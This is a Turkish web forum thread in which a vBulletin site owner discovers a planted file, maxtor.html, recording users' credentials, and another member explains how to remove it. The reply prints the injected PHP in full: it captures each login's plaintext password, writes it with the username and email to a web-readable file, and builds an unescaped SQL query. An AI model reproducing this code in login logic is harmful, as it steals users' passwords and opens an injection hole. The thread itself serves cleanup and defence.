vbulletin maxtor nedir?

ForumAlemi · 1 03-01-2012, 11:05:51

merhaba arkadaşlar,

forum sitemde bazen loginlerde sorun yaşıyorum. Login olmadan hatalı giriş yaptınız sınırı aştınız şeklinde uyarı veriyor. ftp de gezinirken includes içerisinden maxtor.html i buldum. içerisini açtığımda login olan kullanıcıların username ve passwordlerini kaydediyor.

Bunun önüne nasıl geçebilirim.
maxtor bir hack girişimi midir?

yardımlarınızı bekliyorum

Nautilus · 2 03-01-2012, 11:29:33

merhaba

malesef logger kurmuşlar.login.php ve global.php de kodları düzenlemeniz gerekiyor.

login.php yi açıp ;

// create new session
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);

bul ve altındaki şu kodlamayı sil;

PHP- Kodu:

  $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
   $lg_password = $vbulletin->GPC["vb_login_password"];
   //    The log will be recorded in this file
   $lg_file = "./includes/maxtor.html";
   $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
   
   while($row = @mysql_fetch_array($sql_query))
   {
   
      if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
      {
         $fp1 = @fopen($lg_file, "a+");
         @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
         @fclose($fp1);
         $f = @file($lg_file);
         $new = array_unique($f);
         $fp = @fopen($lg_file, "w");
         foreach($new as $values)
         {
            @fputs($fp, $values);
         }
         @fclose($fp);
      }
   }

global.php yi a ve şu kodu bul ;

//$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;

yukardaki kodu aşağıdaki kod ile degiştiriyoruz ;

$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;

Not: Yedek almadan işlem yapmayın...

ForumAlemi · 3 03-01-2012, 12:07:47

Nautilus teşekkür ederim dediğin gibi yaptım. Şuan sorun yok gibi.

Nautilus · 4 03-01-2012, 12:50:31

Rica ederim.maxtor.html'yi silmeyi ihmal etme.

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder